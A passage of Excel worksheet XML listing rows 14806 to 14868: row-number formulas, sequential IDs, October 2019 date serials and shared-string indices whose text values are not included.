    </row>
    <row r="14806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14806">
        <f t="shared" si="231"/>
        <v>14805</v>
      </c>
      <c r="B14806">
        <v>4805</v>
      </c>
      <c r="C14806" t="s">
        <v>19637</v>
      </c>
      <c r="D14806" s="1">
        <v>43740</v>
      </c>
      <c r="E14806" t="s">
        <v>25281</v>
      </c>
      <c r="F14806" t="s">
        <v>10526</v>
      </c>
      <c r="G14806" t="s">
        <v>25282</v>
      </c>
    </row>
    <row r="14807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14807">
        <f t="shared" si="231"/>
        <v>14806</v>
      </c>
      <c r="B14807">
        <v>4806</v>
      </c>
      <c r="C14807" t="s">
        <v>19637</v>
      </c>
      <c r="D14807" s="1">
        <v>43746</v>
      </c>
      <c r="F14807" t="s">
        <v>9978</v>
      </c>
      <c r="G14807" t="s">
        <v>25283</v>
      </c>
    </row>
    <row r="14808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14808">
        <f t="shared" si="231"/>
        <v>14807</v>
      </c>
      <c r="B14808">
        <v>4807</v>
      </c>
      <c r="C14808" t="s">
        <v>19637</v>
      </c>
      <c r="D14808" s="1">
        <v>43749</v>
      </c>
      <c r="E14808" t="s">
        <v>19648</v>
      </c>
      <c r="F14808" t="s">
        <v>10021</v>
      </c>
      <c r="G14808" t="s">
        <v>25284</v>
      </c>
    </row>
    <row r="14809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14809">
        <f t="shared" si="231"/>
        <v>14808</v>
      </c>
      <c r="B14809">
        <v>4808</v>
      </c>
      <c r="C14809" t="s">
        <v>19637</v>
      </c>
      <c r="D14809" s="1">
        <v>43744</v>
      </c>
      <c r="E14809" t="s">
        <v>19640</v>
      </c>
      <c r="F14809" t="s">
        <v>9975</v>
      </c>
      <c r="G14809" t="s">
        <v>25285</v>
      </c>
    </row>
    <row r="14810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14810">
        <f t="shared" si="231"/>
        <v>14809</v>
      </c>
      <c r="B14810">
        <v>4809</v>
      </c>
      <c r="C14810" t="s">
        <v>19637</v>
      </c>
      <c r="D14810" s="1">
        <v>43750</v>
      </c>
      <c r="E14810" t="s">
        <v>19650</v>
      </c>
      <c r="F14810" t="s">
        <v>10021</v>
      </c>
      <c r="G14810" t="s">
        <v>25286</v>
      </c>
    </row>
    <row r="14811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14811">
        <f t="shared" si="231"/>
        <v>14810</v>
      </c>
      <c r="B14811">
        <v>4810</v>
      </c>
      <c r="C14811" t="s">
        <v>19637</v>
      </c>
      <c r="D14811" s="1">
        <v>43754</v>
      </c>
      <c r="E14811" t="s">
        <v>25287</v>
      </c>
      <c r="F14811" t="s">
        <v>10021</v>
      </c>
      <c r="G14811" t="s">
        <v>25288</v>
      </c>
    </row>
    <row r="14812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14812">
        <f t="shared" si="231"/>
        <v>14811</v>
      </c>
      <c r="B14812">
        <v>4811</v>
      </c>
      <c r="C14812" t="s">
        <v>19637</v>
      </c>
      <c r="D14812" s="1">
        <v>43749</v>
      </c>
      <c r="E14812" t="s">
        <v>19680</v>
      </c>
      <c r="F14812" t="s">
        <v>10021</v>
      </c>
      <c r="G14812" t="s">
        <v>25289</v>
      </c>
    </row>
    <row r="14813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14813">
        <f t="shared" si="231"/>
        <v>14812</v>
      </c>
      <c r="B14813">
        <v>4812</v>
      </c>
      <c r="C14813" t="s">
        <v>19637</v>
      </c>
      <c r="D14813" s="1">
        <v>43743</v>
      </c>
      <c r="F14813" t="s">
        <v>10526</v>
      </c>
      <c r="G14813" t="s">
        <v>25290</v>
      </c>
    </row>
    <row r="14814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14814">
        <f t="shared" si="231"/>
        <v>14813</v>
      </c>
      <c r="B14814">
        <v>4813</v>
      </c>
      <c r="C14814" t="s">
        <v>19637</v>
      </c>
      <c r="D14814" s="1">
        <v>43749</v>
      </c>
      <c r="E14814" t="s">
        <v>19680</v>
      </c>
      <c r="F14814" t="s">
        <v>10021</v>
      </c>
      <c r="G14814" t="s">
        <v>25291</v>
      </c>
    </row>
    <row r="14815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14815">
        <f t="shared" si="231"/>
        <v>14814</v>
      </c>
      <c r="B14815">
        <v>4814</v>
      </c>
      <c r="C14815" t="s">
        <v>19637</v>
      </c>
      <c r="D14815" s="1">
        <v>43756</v>
      </c>
      <c r="E14815" t="s">
        <v>25292</v>
      </c>
      <c r="F14815" t="s">
        <v>10526</v>
      </c>
      <c r="G14815" t="s">
        <v>25293</v>
      </c>
    </row>
    <row r="14816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14816">
        <f t="shared" si="231"/>
        <v>14815</v>
      </c>
      <c r="B14816">
        <v>4815</v>
      </c>
      <c r="C14816" t="s">
        <v>19637</v>
      </c>
      <c r="D14816" s="1">
        <v>43742</v>
      </c>
      <c r="E14816" t="s">
        <v>19982</v>
      </c>
      <c r="F14816" t="s">
        <v>9978</v>
      </c>
      <c r="G14816" t="s">
        <v>25294</v>
      </c>
    </row>
    <row r="14817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14817">
        <f t="shared" si="231"/>
        <v>14816</v>
      </c>
      <c r="B14817">
        <v>4816</v>
      </c>
      <c r="C14817" t="s">
        <v>19637</v>
      </c>
      <c r="D14817" s="1">
        <v>43743</v>
      </c>
      <c r="E14817" t="s">
        <v>20331</v>
      </c>
      <c r="F14817" t="s">
        <v>10526</v>
      </c>
      <c r="G14817" t="s">
        <v>25295</v>
      </c>
    </row>
    <row r="14818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14818">
        <f t="shared" si="231"/>
        <v>14817</v>
      </c>
      <c r="B14818">
        <v>4817</v>
      </c>
      <c r="C14818" t="s">
        <v>19637</v>
      </c>
      <c r="D14818" s="1">
        <v>43743</v>
      </c>
      <c r="F14818" t="s">
        <v>10021</v>
      </c>
      <c r="G14818" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14819">
        <f t="shared" si="231"/>
        <v>14818</v>
      </c>
      <c r="B14819">
        <v>4818</v>
      </c>
      <c r="C14819" t="s">
        <v>19637</v>
      </c>
      <c r="D14819" s="1">
        <v>43750</v>
      </c>
      <c r="E14819" t="s">
        <v>25296</v>
      </c>
      <c r="F14819" t="s">
        <v>10526</v>
      </c>
      <c r="G14819" t="s">
        <v>25297</v>
      </c>
    </row>
    <row r="14820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14820">
        <f t="shared" si="231"/>
        <v>14819</v>
      </c>
      <c r="B14820">
        <v>4819</v>
      </c>
      <c r="C14820" t="s">
        <v>19637</v>
      </c>
      <c r="D14820" s="1">
        <v>43748</v>
      </c>
      <c r="E14820" t="s">
        <v>19849</v>
      </c>
      <c r="F14820" t="s">
        <v>10021</v>
      </c>
      <c r="G14820" t="s">
        <v>25298</v>
      </c>
    </row>
    <row r="14821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14821">
        <f t="shared" si="231"/>
        <v>14820</v>
      </c>
      <c r="B14821">
        <v>4820</v>
      </c>
      <c r="C14821" t="s">
        <v>19637</v>
      </c>
      <c r="D14821" s="1">
        <v>43756</v>
      </c>
      <c r="F14821" t="s">
        <v>9978</v>
      </c>
      <c r="G14821" t="s">
        <v>25299</v>
      </c>
    </row>
    <row r="14822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14822">
        <f t="shared" si="231"/>
        <v>14821</v>
      </c>
      <c r="B14822">
        <v>4821</v>
      </c>
      <c r="C14822" t="s">
        <v>19637</v>
      </c>
      <c r="D14822" s="1">
        <v>43745</v>
      </c>
      <c r="F14822" t="s">
        <v>10526</v>
      </c>
      <c r="G14822" t="s">
        <v>25300</v>
      </c>
    </row>
    <row r="14823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14823">
        <f t="shared" si="231"/>
        <v>14822</v>
      </c>
      <c r="B14823">
        <v>4822</v>
      </c>
      <c r="C14823" t="s">
        <v>19637</v>
      </c>
      <c r="D14823" s="1">
        <v>43753</v>
      </c>
      <c r="E14823" t="s">
        <v>20293</v>
      </c>
      <c r="F14823" t="s">
        <v>10526</v>
      </c>
      <c r="G14823" t="s">
        <v>25301</v>
      </c>
    </row>
    <row r="14824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14824">
        <f t="shared" si="231"/>
        <v>14823</v>
      </c>
      <c r="B14824">
        <v>4823</v>
      </c>
      <c r="C14824" t="s">
        <v>19637</v>
      </c>
      <c r="D14824" s="1">
        <v>43754</v>
      </c>
      <c r="F14824" t="s">
        <v>10526</v>
      </c>
      <c r="G14824" t="s">
        <v>25302</v>
      </c>
    </row>
    <row r="14825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14825">
        <f t="shared" si="231"/>
        <v>14824</v>
      </c>
      <c r="B14825">
        <v>4824</v>
      </c>
      <c r="C14825" t="s">
        <v>19637</v>
      </c>
      <c r="D14825" s="1">
        <v>43749</v>
      </c>
      <c r="E14825" t="s">
        <v>19705</v>
      </c>
      <c r="F14825" t="s">
        <v>10021</v>
      </c>
      <c r="G14825" t="s">
        <v>25303</v>
      </c>
    </row>
    <row r="14826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14826">
        <f t="shared" si="231"/>
        <v>14825</v>
      </c>
      <c r="B14826">
        <v>4825</v>
      </c>
      <c r="C14826" t="s">
        <v>19637</v>
      </c>
      <c r="D14826" s="1">
        <v>43748</v>
      </c>
      <c r="F14826" t="s">
        <v>10526</v>
      </c>
      <c r="G14826" t="s">
        <v>25304</v>
      </c>
    </row>
    <row r="14827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14827">
        <f t="shared" si="231"/>
        <v>14826</v>
      </c>
      <c r="B14827">
        <v>4826</v>
      </c>
      <c r="C14827" t="s">
        <v>19637</v>
      </c>
      <c r="D14827" s="1">
        <v>43754</v>
      </c>
      <c r="E14827" t="s">
        <v>19648</v>
      </c>
      <c r="F14827" t="s">
        <v>10021</v>
      </c>
      <c r="G14827" t="s">
        <v>25305</v>
      </c>
    </row>
    <row r="14828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14828">
        <f t="shared" si="231"/>
        <v>14827</v>
      </c>
      <c r="B14828">
        <v>4827</v>
      </c>
      <c r="C14828" t="s">
        <v>19637</v>
      </c>
      <c r="D14828" s="1">
        <v>43742</v>
      </c>
      <c r="E14828" t="s">
        <v>19650</v>
      </c>
      <c r="F14828" t="s">
        <v>10021</v>
      </c>
      <c r="G14828" t="s">
        <v>25306</v>
      </c>
    </row>
    <row r="14829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14829">
        <f t="shared" si="231"/>
        <v>14828</v>
      </c>
      <c r="B14829">
        <v>4828</v>
      </c>
      <c r="C14829" t="s">
        <v>19637</v>
      </c>
      <c r="D14829" s="1">
        <v>43745</v>
      </c>
      <c r="F14829" t="s">
        <v>10021</v>
      </c>
      <c r="G14829" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="14830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14830">
        <f t="shared" si="231"/>
        <v>14829</v>
      </c>
      <c r="B14830">
        <v>4829</v>
      </c>
      <c r="C14830" t="s">
        <v>19637</v>
      </c>
      <c r="D14830" s="1">
        <v>43743</v>
      </c>
      <c r="F14830" t="s">
        <v>9978</v>
      </c>
      <c r="G14830" t="s">
        <v>25307</v>
      </c>
    </row>
    <row r="14831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14831">
        <f t="shared" si="231"/>
        <v>14830</v>
      </c>
      <c r="B14831">
        <v>4830</v>
      </c>
      <c r="C14831" t="s">
        <v>19637</v>
      </c>
      <c r="D14831" s="1">
        <v>43754</v>
      </c>
      <c r="E14831" t="s">
        <v>22206</v>
      </c>
      <c r="F14831" t="s">
        <v>9978</v>
      </c>
      <c r="G14831" t="s">
        <v>25308</v>
      </c>
    </row>
    <row r="14832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14832">
        <f t="shared" si="231"/>
        <v>14831</v>
      </c>
      <c r="B14832">
        <v>4831</v>
      </c>
      <c r="C14832" t="s">
        <v>19637</v>
      </c>
      <c r="D14832" s="1">
        <v>43757</v>
      </c>
      <c r="F14832" t="s">
        <v>10021</v>
      </c>
      <c r="G14832" t="s">
        <v>25309</v>
      </c>
    </row>
    <row r="14833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14833">
        <f t="shared" si="231"/>
        <v>14832</v>
      </c>
      <c r="B14833">
        <v>4832</v>
      </c>
      <c r="C14833" t="s">
        <v>19637</v>
      </c>
      <c r="D14833" s="1">
        <v>43748</v>
      </c>
      <c r="F14833" t="s">
        <v>10526</v>
      </c>
      <c r="G14833" t="s">
        <v>25310</v>
      </c>
    </row>
    <row r="14834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14834">
        <f t="shared" si="231"/>
        <v>14833</v>
      </c>
      <c r="B14834">
        <v>4833</v>
      </c>
      <c r="C14834" t="s">
        <v>19637</v>
      </c>
      <c r="D14834" s="1">
        <v>43753</v>
      </c>
      <c r="E14834" t="s">
        <v>21517</v>
      </c>
      <c r="F14834" t="s">
        <v>9978</v>
      </c>
      <c r="G14834" t="s">
        <v>25311</v>
      </c>
    </row>
    <row r="14835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14835">
        <f t="shared" si="231"/>
        <v>14834</v>
      </c>
      <c r="B14835">
        <v>4834</v>
      </c>
      <c r="C14835" t="s">
        <v>19637</v>
      </c>
      <c r="D14835" s="1">
        <v>43749</v>
      </c>
      <c r="E14835" t="s">
        <v>25312</v>
      </c>
      <c r="F14835" t="s">
        <v>9978</v>
      </c>
      <c r="G14835" t="s">
        <v>25313</v>
      </c>
    </row>
    <row r="14836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14836">
        <f t="shared" si="231"/>
        <v>14835</v>
      </c>
      <c r="B14836">
        <v>4835</v>
      </c>
      <c r="C14836" t="s">
        <v>19637</v>
      </c>
      <c r="D14836" s="1">
        <v>43746</v>
      </c>
      <c r="E14836" t="s">
        <v>19640</v>
      </c>
      <c r="F14836" t="s">
        <v>10021</v>
      </c>
      <c r="G14836" t="s">
        <v>25314</v>
      </c>
    </row>
    <row r="14837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14837">
        <f t="shared" si="231"/>
        <v>14836</v>
      </c>
      <c r="B14837">
        <v>4836</v>
      </c>
      <c r="C14837" t="s">
        <v>19637</v>
      </c>
      <c r="D14837" s="1">
        <v>43755</v>
      </c>
      <c r="E14837" t="s">
        <v>25315</v>
      </c>
      <c r="F14837" t="s">
        <v>10526</v>
      </c>
      <c r="G14837" t="s">
        <v>25316</v>
      </c>
    </row>
    <row r="14838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14838">
        <f t="shared" si="231"/>
        <v>14837</v>
      </c>
      <c r="B14838">
        <v>4837</v>
      </c>
      <c r="C14838" t="s">
        <v>19637</v>
      </c>
      <c r="D14838" s="1">
        <v>43741</v>
      </c>
      <c r="E14838" t="s">
        <v>19650</v>
      </c>
      <c r="F14838" t="s">
        <v>10021</v>
      </c>
      <c r="G14838" t="s">
        <v>25317</v>
      </c>
    </row>
    <row r="14839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14839">
        <f t="shared" si="231"/>
        <v>14838</v>
      </c>
      <c r="B14839">
        <v>4838</v>
      </c>
      <c r="C14839" t="s">
        <v>19637</v>
      </c>
      <c r="D14839" s="1">
        <v>43753</v>
      </c>
      <c r="E14839" t="s">
        <v>19896</v>
      </c>
      <c r="F14839" t="s">
        <v>10021</v>
      </c>
      <c r="G14839" t="s">
        <v>25318</v>
      </c>
    </row>
    <row r="14840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14840">
        <f t="shared" si="231"/>
        <v>14839</v>
      </c>
      <c r="B14840">
        <v>4839</v>
      </c>
      <c r="C14840" t="s">
        <v>19637</v>
      </c>
      <c r="D14840" s="1">
        <v>43750</v>
      </c>
      <c r="E14840" t="s">
        <v>19650</v>
      </c>
      <c r="F14840" t="s">
        <v>10021</v>
      </c>
      <c r="G14840" t="s">
        <v>25319</v>
      </c>
    </row>
    <row r="14841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14841">
        <f t="shared" si="231"/>
        <v>14840</v>
      </c>
      <c r="B14841">
        <v>4840</v>
      </c>
      <c r="C14841" t="s">
        <v>19637</v>
      </c>
      <c r="D14841" s="1">
        <v>43748</v>
      </c>
      <c r="E14841" t="s">
        <v>19750</v>
      </c>
      <c r="F14841" t="s">
        <v>9978</v>
      </c>
      <c r="G14841" t="s">
        <v>25320</v>
      </c>
    </row>
    <row r="14842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14842">
        <f t="shared" si="231"/>
        <v>14841</v>
      </c>
      <c r="B14842">
        <v>4841</v>
      </c>
      <c r="C14842" t="s">
        <v>19637</v>
      </c>
      <c r="D14842" s="1">
        <v>43752</v>
      </c>
      <c r="E14842" t="s">
        <v>25321</v>
      </c>
      <c r="F14842" t="s">
        <v>10526</v>
      </c>
      <c r="G14842" t="s">
        <v>25322</v>
      </c>
    </row>
    <row r="14843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14843">
        <f t="shared" si="231"/>
        <v>14842</v>
      </c>
      <c r="B14843">
        <v>4842</v>
      </c>
      <c r="C14843" t="s">
        <v>19637</v>
      </c>
      <c r="D14843" s="1">
        <v>43751</v>
      </c>
      <c r="E14843" t="s">
        <v>25323</v>
      </c>
      <c r="F14843" t="s">
        <v>10526</v>
      </c>
      <c r="G14843" t="s">
        <v>25324</v>
      </c>
    </row>
    <row r="14844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14844">
        <f t="shared" si="231"/>
        <v>14843</v>
      </c>
      <c r="B14844">
        <v>4843</v>
      </c>
      <c r="C14844" t="s">
        <v>19637</v>
      </c>
      <c r="D14844" s="1">
        <v>43747</v>
      </c>
      <c r="E14844" t="s">
        <v>19640</v>
      </c>
      <c r="F14844" t="s">
        <v>9975</v>
      </c>
      <c r="G14844" t="s">
        <v>25325</v>
      </c>
    </row>
    <row r="14845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14845">
        <f t="shared" si="231"/>
        <v>14844</v>
      </c>
      <c r="B14845">
        <v>4844</v>
      </c>
      <c r="C14845" t="s">
        <v>19637</v>
      </c>
      <c r="D14845" s="1">
        <v>43753</v>
      </c>
      <c r="F14845" t="s">
        <v>10526</v>
      </c>
      <c r="G14845" t="s">
        <v>25326</v>
      </c>
    </row>
    <row r="14846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14846">
        <f t="shared" si="231"/>
        <v>14845</v>
      </c>
      <c r="B14846">
        <v>4845</v>
      </c>
      <c r="C14846" t="s">
        <v>19637</v>
      </c>
      <c r="D14846" s="1">
        <v>43749</v>
      </c>
      <c r="E14846" t="s">
        <v>19650</v>
      </c>
      <c r="F14846" t="s">
        <v>10021</v>
      </c>
      <c r="G14846" t="s">
        <v>25327</v>
      </c>
    </row>
    <row r="14847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14847">
        <f t="shared" si="231"/>
        <v>14846</v>
      </c>
      <c r="B14847">
        <v>4846</v>
      </c>
      <c r="C14847" t="s">
        <v>19637</v>
      </c>
      <c r="D14847" s="1">
        <v>43739</v>
      </c>
      <c r="E14847" t="s">
        <v>25328</v>
      </c>
      <c r="F14847" t="s">
        <v>10526</v>
      </c>
      <c r="G14847" t="s">
        <v>25329</v>
      </c>
    </row>
    <row r="14848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14848">
        <f t="shared" si="231"/>
        <v>14847</v>
      </c>
      <c r="B14848">
        <v>4847</v>
      </c>
      <c r="C14848" t="s">
        <v>19637</v>
      </c>
      <c r="D14848" s="1">
        <v>43754</v>
      </c>
      <c r="E14848" t="s">
        <v>19640</v>
      </c>
      <c r="F14848" t="s">
        <v>9975</v>
      </c>
      <c r="G14848" t="s">
        <v>25330</v>
      </c>
    </row>
    <row r="14849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14849">
        <f t="shared" si="231"/>
        <v>14848</v>
      </c>
      <c r="B14849">
        <v>4848</v>
      </c>
      <c r="C14849" t="s">
        <v>19637</v>
      </c>
      <c r="D14849" s="1">
        <v>43739</v>
      </c>
      <c r="E14849" t="s">
        <v>20118</v>
      </c>
      <c r="F14849" t="s">
        <v>9978</v>
      </c>
      <c r="G14849" t="s">
        <v>25331</v>
      </c>
    </row>
    <row r="14850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14850">
        <f t="shared" si="231"/>
        <v>14849</v>
      </c>
      <c r="B14850">
        <v>4849</v>
      </c>
      <c r="C14850" t="s">
        <v>19637</v>
      </c>
      <c r="D14850" s="1">
        <v>43752</v>
      </c>
      <c r="E14850" t="s">
        <v>20185</v>
      </c>
      <c r="F14850" t="s">
        <v>9975</v>
      </c>
      <c r="G14850" t="s">
        <v>25332</v>
      </c>
    </row>
    <row r="14851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14851">
        <f t="shared" ref="A14851:A14914" si="232">+ROW(A14850)</f>
        <v>14850</v>
      </c>
      <c r="B14851">
        <v>4850</v>
      </c>
      <c r="C14851" t="s">
        <v>19637</v>
      </c>
      <c r="D14851" s="1">
        <v>43741</v>
      </c>
      <c r="F14851" t="s">
        <v>10526</v>
      </c>
      <c r="G14851" t="s">
        <v>25333</v>
      </c>
    </row>
    <row r="14852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14852">
        <f t="shared" si="232"/>
        <v>14851</v>
      </c>
      <c r="B14852">
        <v>4851</v>
      </c>
      <c r="C14852" t="s">
        <v>19637</v>
      </c>
      <c r="D14852" s="1">
        <v>43739</v>
      </c>
      <c r="E14852" t="s">
        <v>19640</v>
      </c>
      <c r="F14852" t="s">
        <v>10021</v>
      </c>
      <c r="G14852" t="s">
        <v>25334</v>
      </c>
    </row>
    <row r="14853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14853">
        <f t="shared" si="232"/>
        <v>14852</v>
      </c>
      <c r="B14853">
        <v>4852</v>
      </c>
      <c r="C14853" t="s">
        <v>19637</v>
      </c>
      <c r="D14853" s="1">
        <v>43757</v>
      </c>
      <c r="E14853" t="s">
        <v>25236</v>
      </c>
      <c r="F14853" t="s">
        <v>10526</v>
      </c>
      <c r="G14853" t="s">
        <v>25335</v>
      </c>
    </row>
    <row r="14854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14854">
        <f t="shared" si="232"/>
        <v>14853</v>
      </c>
      <c r="B14854">
        <v>4853</v>
      </c>
      <c r="C14854" t="s">
        <v>19637</v>
      </c>
      <c r="D14854" s="1">
        <v>43746</v>
      </c>
      <c r="E14854" t="s">
        <v>21185</v>
      </c>
      <c r="F14854" t="s">
        <v>10526</v>
      </c>
      <c r="G14854" t="s">
        <v>25336</v>
      </c>
    </row>
    <row r="14855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14855">
        <f t="shared" si="232"/>
        <v>14854</v>
      </c>
      <c r="B14855">
        <v>4854</v>
      </c>
      <c r="C14855" t="s">
        <v>19637</v>
      </c>
      <c r="D14855" s="1">
        <v>43749</v>
      </c>
      <c r="F14855" t="s">
        <v>10526</v>
      </c>
      <c r="G14855" t="s">
        <v>25337</v>
      </c>
    </row>
    <row r="14856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14856">
        <f t="shared" si="232"/>
        <v>14855</v>
      </c>
      <c r="B14856">
        <v>4855</v>
      </c>
      <c r="C14856" t="s">
        <v>19637</v>
      </c>
      <c r="D14856" s="1">
        <v>43746</v>
      </c>
      <c r="E14856" t="s">
        <v>19640</v>
      </c>
      <c r="F14856" t="s">
        <v>9975</v>
      </c>
      <c r="G14856" t="s">
        <v>25338</v>
      </c>
    </row>
    <row r="14857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14857">
        <f t="shared" si="232"/>
        <v>14856</v>
      </c>
      <c r="B14857">
        <v>4856</v>
      </c>
      <c r="C14857" t="s">
        <v>19637</v>
      </c>
      <c r="D14857" s="1">
        <v>43754</v>
      </c>
      <c r="F14857" t="s">
        <v>10526</v>
      </c>
      <c r="G14857" t="s">
        <v>25339</v>
      </c>
    </row>
    <row r="14858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14858">
        <f t="shared" si="232"/>
        <v>14857</v>
      </c>
      <c r="B14858">
        <v>4857</v>
      </c>
      <c r="C14858" t="s">
        <v>19637</v>
      </c>
      <c r="D14858" s="1">
        <v>43739</v>
      </c>
      <c r="E14858" t="s">
        <v>19750</v>
      </c>
      <c r="F14858" t="s">
        <v>9978</v>
      </c>
      <c r="G14858" t="s">
        <v>25340</v>
      </c>
    </row>
    <row r="14859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14859">
        <f t="shared" si="232"/>
        <v>14858</v>
      </c>
      <c r="B14859">
        <v>4858</v>
      </c>
      <c r="C14859" t="s">
        <v>19637</v>
      </c>
      <c r="D14859" s="1">
        <v>43748</v>
      </c>
      <c r="E14859" t="s">
        <v>19680</v>
      </c>
      <c r="F14859" t="s">
        <v>10021</v>
      </c>
      <c r="G14859" t="s">
        <v>25341</v>
      </c>
    </row>
    <row r="14860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14860">
        <f t="shared" si="232"/>
        <v>14859</v>
      </c>
      <c r="B14860">
        <v>4859</v>
      </c>
      <c r="C14860" t="s">
        <v>19637</v>
      </c>
      <c r="D14860" s="1">
        <v>43744</v>
      </c>
      <c r="E14860" t="s">
        <v>20458</v>
      </c>
      <c r="F14860" t="s">
        <v>9978</v>
      </c>
      <c r="G14860" t="s">
        <v>25342</v>
      </c>
    </row>
    <row r="14861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14861">
        <f t="shared" si="232"/>
        <v>14860</v>
      </c>
      <c r="B14861">
        <v>4860</v>
      </c>
      <c r="C14861" t="s">
        <v>19637</v>
      </c>
      <c r="D14861" s="1">
        <v>43743</v>
      </c>
      <c r="E14861" t="s">
        <v>19640</v>
      </c>
      <c r="F14861" t="s">
        <v>10021</v>
      </c>
      <c r="G14861" t="s">
        <v>20931</v>
      </c>
    </row>
    <row r="14862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14862">
        <f t="shared" si="232"/>
        <v>14861</v>
      </c>
      <c r="B14862">
        <v>4861</v>
      </c>
      <c r="C14862" t="s">
        <v>19637</v>
      </c>
      <c r="D14862" s="1">
        <v>43755</v>
      </c>
      <c r="E14862" t="s">
        <v>19701</v>
      </c>
      <c r="F14862" t="s">
        <v>10021</v>
      </c>
      <c r="G14862" t="s">
        <v>25343</v>
      </c>
    </row>
    <row r="14863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14863">
        <f t="shared" si="232"/>
        <v>14862</v>
      </c>
      <c r="B14863">
        <v>4862</v>
      </c>
      <c r="C14863" t="s">
        <v>19637</v>
      </c>
      <c r="D14863" s="1">
        <v>43747</v>
      </c>
      <c r="E14863" t="s">
        <v>19663</v>
      </c>
      <c r="F14863" t="s">
        <v>9975</v>
      </c>
      <c r="G14863" t="s">
        <v>25344</v>
      </c>
    </row>
    <row r="14864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14864">
        <f t="shared" si="232"/>
        <v>14863</v>
      </c>
      <c r="B14864">
        <v>4863</v>
      </c>
      <c r="C14864" t="s">
        <v>19637</v>
      </c>
      <c r="D14864" s="1">
        <v>43742</v>
      </c>
      <c r="E14864" t="s">
        <v>19687</v>
      </c>
      <c r="F14864" t="s">
        <v>10021</v>
      </c>
      <c r="G14864" t="s">
        <v>25345</v>
      </c>
    </row>
    <row r="14865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14865">
        <f t="shared" si="232"/>
        <v>14864</v>
      </c>
      <c r="B14865">
        <v>4864</v>
      </c>
      <c r="C14865" t="s">
        <v>19637</v>
      </c>
      <c r="D14865" s="1">
        <v>43755</v>
      </c>
      <c r="F14865" t="s">
        <v>10526</v>
      </c>
      <c r="G14865" t="s">
        <v>25346</v>
      </c>
    </row>
    <row r="14866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14866">
        <f t="shared" si="232"/>
        <v>14865</v>
      </c>
      <c r="B14866">
        <v>4865</v>
      </c>
      <c r="C14866" t="s">
        <v>19637</v>
      </c>
      <c r="D14866" s="1">
        <v>43756</v>
      </c>
      <c r="E14866" t="s">
        <v>22488</v>
      </c>
      <c r="F14866" t="s">
        <v>10526</v>
      </c>
      <c r="G14866" t="s">
        <v>25347</v>
      </c>
    </row>
    <row r="14867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14867">
        <f t="shared" si="232"/>
        <v>14866</v>
      </c>
      <c r="B14867">
        <v>4866</v>
      </c>
      <c r="C14867" t="s">
        <v>19637</v>
      </c>
      <c r="D14867" s="1">
        <v>43749</v>
      </c>
      <c r="F14867" t="s">
        <v>10526</v>
      </c>
      <c r="G14867" t="s">
        <v>25348</v>
      </c>
    </row>
    <row r="14868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14868">
        <f t="shared" si="232"/>
        <v>14867</v>
      </c>
      <c r="B14868">
        <v>4867</v>
      </c>
      <c r="C14868" t="s">
        <v>19637</v>
      </c>
      <c r="D14868" s="1">
        <v>43742</v>
      </c>
      <c r="F14868" t="s">
        <v>10526</v>
      </c>
      <c r="G14868" t="s">
        <v>25349</v>
      </c>
